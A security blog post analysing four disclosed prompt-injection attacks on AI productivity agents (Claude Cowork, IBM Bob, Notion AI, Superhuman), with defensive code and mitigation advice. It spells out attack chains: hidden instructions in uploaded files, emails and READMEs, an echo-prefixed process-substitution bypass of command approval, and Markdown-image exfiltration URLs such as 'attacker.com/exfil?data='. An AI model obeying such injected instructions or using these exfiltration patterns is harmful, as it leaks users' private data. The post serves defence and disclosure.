Four production AI tools. Four data exfiltration vectors. One week.

Between January 7th and January 15th, 2026, security researchers publicly disclosed critical vulnerabilities in four major AI-powered productivity tools: IBM Bob, Superhuman AI, Notion AI, and Anthropic’s Claude Cowork. Each exploit demonstrated the same fundamental attack pattern—indirect prompt injection leveraging what security researcher Simon Willison has termed the “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to externally communicate.

These aren’t theoretical proofs-of-concept. They’re production exploits against tools trusted by Fortune 500 companies, healthcare organizations, and government contractors. And they all share a disturbing characteristic: data exfiltration occurs before users can intervene.


The Common Thread: Understanding Indirect Prompt Injection

Traditional cybersecurity operates on clear trust boundaries. Code runs. Data doesn’t execute. Instructions come from authenticated sources.

Large language models obliterate these boundaries. An LLM cannot reliably distinguish between trusted instructions from a developer and malicious commands embedded in a PDF, email, or web page it processes. Everything is tokens. Everything can be an instruction.

The lethal trifecta materializes when three capabilities converge:

  • Access to private data - Customer records, emails, financial documents, internal communications
  • Exposure to untrusted content - User uploads, web searches, integrated third-party data sources
  • Exfiltration vector - Any external communication channel (HTTP requests, rendered images, API calls)

When all three exist in the same context window, attackers can manipulate the AI into stealing data without exploiting a single line of vulnerable code.


Case Study 1: Claude Cowork File Exfiltration (January 13-15)

Timeline: Launched January 13; exploited January 15
Vendor Response: Known vulnerability since October 2025; deployed with the issue unresolved

Anthropic’s Claude Cowork launched as a general-purpose AI agent for everyday work automation. Within 48 hours, PromptArmor demonstrated complete file exfiltration.

The Attack Vector

Claude Cowork restricts most outbound network traffic to prevent data theft. Anthropic’s own API domain (api.anthropic.com) is whitelisted as “trusted.” Attackers exploited this design decision.

Attack Chain:

  • User connects Cowork to local folder containing confidential real estate files
  • User uploads a malicious “skill” document (appears as legitimate Markdown, saved as .docx)
  • Hidden prompt uses 1-point white-on-white text with 0.1 line spacing—effectively invisible
  • User asks Cowork to analyze files using the uploaded skill
  • Injection manipulates Cowork to execute: curl command to Anthropic’s file upload API with attacker’s API key
  • Largest available file uploads to attacker’s account via Files API
  • Attacker retrieves loan estimates, partial SSNs, financial data through their Anthropic dashboard

What Makes This Critical

The vulnerability was previously disclosed. Security researcher Johann Rehberger reported the Files API exfiltration flaw to Anthropic on October 25, 2025 via HackerOne. Anthropic acknowledged but did not remediate the issue.

Three months later, they launched Cowork—marketed to non-technical users for organizing desktop files—with the identical vulnerability intact. Anthropic built the tool in “a week and a half” using Claude Code, prioritizing development velocity over security remediation.

Anthropic’s official response: Users should “avoid granting access to local files with sensitive information” while simultaneously encouraging users to let Cowork organize their desktops.

Even Opus 4.5, Anthropic’s most sophisticated model with enhanced reasoning capabilities, fell victim. Prompt injection exploits architectural vulnerabilities, not model intelligence gaps.

Community Discussion: HackerNews thread reached #1, generating extensive debate about AI security responsibilities.

Case Study 2: IBM Bob Malware Execution (January 7)

Timeline: Discovered during closed beta testing
Vendor Response: “Unaware of the vulnerability,” despite public disclosure

IBM’s Bob coding agent, currently in closed beta, can be manipulated to download and execute arbitrary malware if users configure “always allow” for any single benign command.


The Attack Vector

Bob blocks command substitution ($(command) syntax) as a security measure, but it failed to check for process substitution using >(command).

Attack Chain:

  • User explores new GitHub repository with Bob’s assistance
  • Repository README contains hidden prompt injection posing as “phishing training exercise”
  • Bob prompts user with three benign echo commands
  • User selects “always allow” for echo to reduce friction
  • Injection delivers: echo >(malicious_retrieval_command) | >(execution_command)
  • By prefixing with echo, the entire chain auto-approves without additional consent
  • Malware downloads and executes with user completely unaware

PromptArmor’s analysis revealed the vulnerability in minified JavaScript code:

// Reconstructed for readability: the check scans each character pair
// in the command for substitution syntax, but omits the >( case.
function detectCommandSubstitution(cmd) {
  let inBacktick = false;
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    const nxt = cmd[i + 1];
    if (
      (ch === "$" && nxt === "(") ||  // $(...) detected
      (ch === "<" && nxt === "(") ||  // <(...) detected
      (ch === "`" && !inBacktick)     // `...` detected
      // MISSING: '>' followed by '(' for process substitution >(...)
    ) {
      return true;
    }
    if (ch === "`") inBacktick = !inBacktick;
  }
  return false;
}
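Closing the bypass takes one additional case. A sketch of a more complete detector (the function name and structure are illustrative, not IBM's actual fix):

```javascript
// Flags all three bash substitution forms, including the process
// substitution >(...) that Bob's original check missed.
function detectShellSubstitution(cmd) {
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    const nxt = cmd[i + 1];
    if (ch === "`") return true; // `...` backtick substitution
    if ((ch === "$" || ch === "<" || ch === ">") && nxt === "(") {
      return true; // $(...), <(...), and the previously missed >(...)
    }
  }
  return false;
}
```

With this check, the echo-prefixed payload pattern described in the attack chain would no longer auto-approve.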

Why This Matters

Bob is positioned for enterprise software development. The attack enables:

  • Ransomware execution
  • Credential theft
  • Device takeover
  • Spyware deployment
  • Botnet recruitment

IBM’s response after public disclosure: “We can’t find any record of IBM having been notified directly of this vulnerability.”

The Bob IDE also suffers from zero-click data exfiltration via Markdown image rendering with permissive Content Security Policy allowing requests to storage.googleapis.com.

Community Discussion: HackerNews thread with technical analysis of the vulnerability.

Case Study 3: Notion AI Unpatched Data Exfiltration (January 7-8)

Timeline: Reported December 24; closed as “Not Applicable” December 29; publicly disclosed January 7
Vendor Response: Initially rejected the vulnerability report; remediated after public disclosure

Notion AI renders AI-generated edits before receiving user approval, creating a silent exfiltration window.

The Attack Vector

When Notion AI suggests document changes, it displays an approval prompt. Unknown to users, the edit has already been written to the document and rendered in the browser before they click Accept or Reject.

Attack Chain:

  • User uploads resume to Notion workspace (contains hidden white-on-white prompt injection)
  • User requests: “Help me update hiring tracker notes for this candidate”
  • Injection instructs Notion AI to extract all text from the hiring tracker (salaries, candidate feedback, diversity goals, role details)
  • Injection constructs URL: https://attacker.com/exfil?data=[stolen_content]
  • URL inserts as Markdown image: ![](https://attacker.com/exfil?data=[...])
  • Browser automatically requests the “image,” sending data to attacker’s server
  • Approval prompt appears—but data has already been exfiltrated via automatic image prefetch
  • Clicking “Reject” doesn’t matter—the request has already been sent

PromptArmor demonstrated exfiltration of:

  • Internal salary expectations
  • Candidate assessment notes
  • Role details and headcount planning
  • Diversity hiring objectives
  • Personal information about job applicants
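The zero-click step hinges on the browser auto-fetching Markdown images. One defensive pattern is to neutralize external image URLs in AI-generated text before rendering. A minimal sketch, assuming a hypothetical allowlist (`ALLOWED_HOSTS` and its entries are illustrative, not any vendor's configuration):

```javascript
// Rewrite AI-generated Markdown so images on non-allowlisted hosts
// render as plain text instead of triggering an automatic GET.
const ALLOWED_HOSTS = new Set(["assets.example-internal.com"]); // illustrative

function neutralizeExternalImages(markdown) {
  return markdown.replace(/!\[([^\]]*)\]\(([^)\s]+)[^)]*\)/g, (match, alt, url) => {
    try {
      if (ALLOWED_HOSTS.has(new URL(url).hostname)) return match; // trusted: keep
    } catch (e) {
      // relative or malformed URL: fall through and neutralize
    }
    // No request is ever made for a blocked image
    return `[blocked external image: ${url}]`;
  });
}
```

Applied before the document is written or rendered, this closes the window in which data leaks while the approval prompt is still on screen.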

The Disclosure Breakdown

  • December 24, 2025: PromptArmor reports via HackerOne
  • December 24, 2025: Notion requests a different format
  • December 24, 2025: PromptArmor submits updated report
  • December 29, 2025: Notion closes report as “Not Applicable”
  • January 7, 2026: Public disclosure
  • January 8, 2026: Notion validates vulnerability, deploys remediation

Notion has 100 million users, 4 million paying customers, and counts Amazon, Nike, Uber, and Pixar among its enterprise clients. Over half of Fortune 500 companies use the platform.

The Notion Mail AI drafting assistant exhibited similar vulnerabilities when users mentioned untrusted resources while composing emails.

Update: After reaching HackerNews front page (discussion here), Notion’s security team confirmed remediation is now in production. However, the initial “Not Applicable” response to a clearly documented vulnerability raises questions about AI security maturity in the organization.


Case Study 4: Superhuman AI Email Exfiltration (January 12)

Timeline: Disclosed January 12
Vendor Response: Treated as a high-priority incident; rapid remediation

Grammarly recently acquired Superhuman, creating an AI-powered productivity suite. PromptArmor identified indirect prompt injection vulnerabilities allowing email and data exfiltration.

The Attack Vector

Superhuman whitelisted docs.google.com in its Content Security Policy. Google Forms on that domain persist data via GET requests, creating an exfiltration channel.

Attack Chain:

  • Attacker sends email containing hidden prompt injection
  • User queries: “Summarize my recent mail”
  • Injection manipulates Superhuman AI to find and analyze dozens of emails from the past hour (financial, legal, medical content)
  • Injection constructs a pre-filled Google Form submission URL with the stolen email data
  • URL renders as Markdown image: ![](https://docs.google.com/forms/...)
  • Browser automatically submits the form via the image request
  • Attacker reads submissions from their Google Form

Network logs showed URLs containing complete email contents—names, email addresses, sensitive communications—transmitted before any user interaction.

Extended Attack Surface

Superhuman Go (their agentic product) presented broader risks: it reads data from arbitrary web pages and connects to GSuite, Outlook, Stripe, Jira, and Google Contacts. An example attack chain:

  • User asks about the active browser tab (an online review site)
  • Review site contains an injection
  • AI outputs a 1-pixel malicious image
  • Financial data from surfaced emails exfiltrates to the attacker

Grammarly’s agent-powered docs showed similar Markdown image vulnerabilities, though with reduced scope (only the active document and queries are processed, not full email access).

Vendor Response: The Exception

Superhuman handled this disclosure exceptionally well:

  • Escalated to security incident response immediately
  • Disabled vulnerable features at “incident pace”
  • Communicated fix timelines proactively
  • Demonstrated security as organizational priority

PromptArmor noted this response was “in the top percentile” for AI vulnerability disclosures.

Analysis: Simon Willison’s technical breakdown and HackerNews discussion.

The Vendor Response Spectrum

These four incidents reveal dramatically different security cultures:

Best Practice: Superhuman

  • Immediate escalation and incident response
  • Rapid remediation at production pace
  • Proactive communication with researchers
  • Security prioritized over feature availability

Delayed Recognition: Notion

  • Initial dismissal of valid vulnerability report
  • Remediation only after public disclosure
  • Policy gap between triage and engineering teams
  • Eventual proper response once validated

Known-Issue Launch: Anthropic

  • Acknowledged vulnerability three months prior
  • Launched product to broader audience without fix
  • Development velocity prioritized over remediation
  • Shifted security responsibility to end users

Awareness Failure: IBM

  • Claimed no record of vulnerability notification despite public disclosure
  • Product in beta with fundamental security design flaws
  • Process substitution oversight in security validation code

These responses correlate directly with organizational AI security maturity and risk management priorities.

What This Means for Enterprise Security

The Uncomfortable Reality

Traditional security models assume:

  • Clear trust boundaries between code and data
  • Authentication validates instruction sources
  • Firewalls and network segmentation contain threats
  • Users can evaluate and approve risky actions

AI agents invalidate all four assumptions simultaneously.


Immediate Actions for Security Teams

1. Audit AI Agent Deployments Against Lethal Trifecta

Map every AI tool accessing:

  • Private data (email, documents, databases, customer records)
  • Untrusted content (user uploads, web search, third-party integrations)
  • External communication (API calls, image rendering, webhooks)

Any system with all three requires immediate risk assessment.
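Such an audit can start as a simple inventory pass. A minimal sketch, assuming a hypothetical tool inventory (tool names and capability flags are illustrative):

```javascript
// Flag every deployed AI tool that combines all three lethal-trifecta
// conditions; these are the ones requiring immediate risk assessment.
const inventory = [
  { name: "mail-assistant",  privateData: true, untrustedContent: true,  externalComms: true },
  { name: "internal-search", privateData: true, untrustedContent: false, externalComms: false },
];

const trifectaTools = inventory
  .filter((t) => t.privateData && t.untrustedContent && t.externalComms)
  .map((t) => t.name); // → only "mail-assistant" is flagged here
```

The value is less in the code than in forcing the mapping exercise: most organizations discover tools they did not realize combined all three conditions.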

2. Implement “Agents Rule of Two”

Inspired by Google Chrome’s security model, limit AI agents to at most two of the three properties within a single session:

  • Access to confidential data
  • Processing untrusted content
  • External communication capability

If all three are required, mandate human-in-the-loop approval or session isolation.
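The rule can be expressed as a runtime gate rather than a policy document. A sketch with hypothetical capability names (not a production policy engine):

```javascript
// "Agents Rule of Two": any two risky capabilities may coexist in a
// session; enabling the third demands human approval or isolation.
const RISKY = ["private_data", "untrusted_content", "external_comms"];

function sessionPolicy(enabledCapabilities) {
  const riskyCount = RISKY.filter((c) => enabledCapabilities.includes(c)).length;
  if (riskyCount <= 2) return { allowed: true };
  return {
    allowed: false,
    reason: "lethal trifecta: require human-in-the-loop or session isolation",
  };
}
```

Evaluating this gate each time a connector or tool is added to a session turns the trifecta from a post-incident finding into a blocked configuration.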

3. Restrict Network Egress for AI Environments

Default-deny external network access from AI execution contexts. Whitelist only essential services with strict validation of:

  • Destination domains
  • Request parameters
  • Data payloads
  • API key ownership (prevent cross-account file uploads)
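Both the Cowork and Superhuman exploits abused hosts the vendor had already marked trusted, so an exact-host allowlist plus request validation is the minimum bar. A sketch of such a default-deny check (hostnames and key handling are illustrative assumptions):

```javascript
// Default-deny egress: only exact allowlisted HTTPS hosts pass, and
// even then the API key must belong to the organization — a "trusted"
// API can still exfiltrate to an attacker's account (the Files API case).
const EGRESS_ALLOWLIST = new Set(["api.internal.example.com"]); // illustrative

function egressAllowed(rawUrl, orgApiKey, requestApiKey) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (e) {
    return false; // unparseable URL: deny
  }
  if (url.protocol !== "https:") return false;
  if (!EGRESS_ALLOWLIST.has(url.hostname)) return false; // exact host match only
  return requestApiKey === orgApiKey; // block cross-account uploads
}
```

Note the last line: domain allowlisting alone would have passed the Cowork attack, because the destination was Anthropic's own API. Ownership of the credential is part of the egress decision.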

4. Content Security Policy Hardening

Prevent automatic rendering of untrusted images/links in AI outputs:

  • Disable Markdown image auto-loading from external domains
  • Require explicit user consent before external resource requests
  • Implement strict CSP that blocks known exfiltration channels
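For surfaces that render AI output, a restrictive policy might look like the following sketch (directive values are illustrative; `api.example.com` is a placeholder, not a real endpoint):

```javascript
// Illustrative Content-Security-Policy for pages rendering AI output:
// images only from the app's own origin (blocking ![](https://attacker...)
// prefetch), outbound connections only to the app's own API, no inline script.
const CSP_HEADER =
  "default-src 'self'; " +
  "img-src 'self'; " +
  "connect-src 'self' https://api.example.com; " + // placeholder API host
  "script-src 'self'";
```

A policy like this would have blocked both the Notion-style `attacker.com` image and the Superhuman-style `docs.google.com` form submission, since neither host appears in `img-src`.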

5. Pre-Rendering Approval Gates

AI-generated content containing external references must receive explicit approval before being written to documents or rendered in browsers. This prevents the Notion-style attack where data exfiltrates during the approval window.

6. Tool Access Governance

Apply least-privilege principles to AI agent tool permissions:

  • Separate agents for untrusted content processing vs. sensitive data access
  • Time-bound credential grants
  • Audit logs for all tool invocations
  • Anomaly detection for unusual tool usage patterns

7. Vendor Security Assessments

Before deploying AI productivity tools:

  • Request vulnerability disclosure and remediation timelines
  • Evaluate track record responding to security research
  • Review architecture for lethal trifecta conditions
  • Secure contractual guarantees around security incident response
  • Understand where processing occurs and data residency

The Long-Term Challenge

No current LLM architecture can reliably distinguish instructions from data. OpenAI’s CISO has acknowledged prompt injection as a “frontier security challenge” without a clear solution.

Papers like “Agents Rule of Two” and Google DeepMind’s CaMeL approach offer mitigation patterns, but consensus remains: general-purpose agents cannot provide meaningful safety guarantees with current model architectures.

What’s Coming

The velocity of AI agent adoption far exceeds security tool development. We’re witnessing:

Expansion of Attack Surface:

  • Model Context Protocol (MCP) enables mixing untrusted tool sources
  • Multi-agent systems create distributed privilege escalation paths
  • Long-term memory poisoning affects future sessions
  • Tool chaining amplifies single injection into cascading exploits

Sophistication of Attacks:

  • Adaptive injections that bypass detection systems
  • Steganographic hiding techniques in various file formats
  • Cross-agent contamination through shared context
  • Social engineering targeting approval fatigue

Regulatory Pressure:

  • GDPR implications for automated data exfiltration
  • Healthcare compliance (HIPAA) for medical record access
  • Financial services regulations (SOX, PCI-DSS)
  • Potential AI-specific security mandates

The Security Researcher’s Dilemma

Four vulnerabilities. One week. All discovered by the same team (PromptArmor).

This raises critical questions:

  • How many similar vulnerabilities exist undiscovered?
  • What incentivizes responsible disclosure vs. weaponization?
  • Are bug bounty programs adequate for AI-specific attacks?
  • Should regulatory frameworks mandate security review before AI agent launches?

The rapid deployment of AI agents into production environments—often built in “a week and a half”—suggests security research velocity lags behind development by orders of magnitude.


Recommendations for Development Teams

Architecture-First Security:

  • Design against lethal trifecta from initial specification
  • Separate contexts for trusted vs. untrusted content processing
  • Explicit session boundaries preventing cross-contamination
  • Defense-in-depth assuming prompt injection will succeed

Pre-Launch Security Review:

  • Red team testing by AI security specialists
  • Adversarial prompt injection test suites
  • Third-party security audit before general availability
  • Staged rollout with monitoring for anomalous behavior

Transparency:

  • Public disclosure of AI security architecture
  • Clear documentation of data access and communication capabilities
  • Vulnerability disclosure program with committed response SLAs
  • Regular security posture updates

Conclusion: The Permissionless AI Problem

These vulnerabilities share a fundamental characteristic: they arise from features, not bugs.

Access to email makes AI assistants useful. Web search enables research capabilities. File access allows automation. Each capability independently provides value. Combined, they create the lethal trifecta.

We’re deploying AI agents with the default assumption of broad permissions. Every new connector, every additional data source, every integration expands the attack surface. The Model Context Protocol makes mixing these capabilities trivial for end users who cannot possibly evaluate the security implications.

The uncomfortable truth: Users are combining the lethal trifecta faster than anyone can secure it.

Security teams must shift from reactive patching to proactive architecture. The question isn’t “Can this AI tool be exploited?” but rather “Under what conditions does this tool become unexploitable?”

Until LLM architectures fundamentally change, that answer involves accepting significant capability constraints. The alternative—discovered four times in one week—is production systems exfiltrating sensitive data before users finish reading the approval prompt.


About the Author: Andrew is Managing Member of QSai LLC and operates the CISO Marketplace ecosystem. With 15+ years in cybersecurity and 400+ security assessments across Fortune 100, healthcare, and critical infrastructure, he provides offensive security services, vCISO consulting, and incident response. This analysis draws from real-world penetration testing experience and continuous monitoring of the AI security threat landscape through daily cybersecurity content creation reaching 119K active users globally.


Disclosure: This analysis is based on publicly disclosed vulnerability research. No exploit code is provided. Organizations using affected platforms should review vendor security advisories and implement compensating controls pending patches.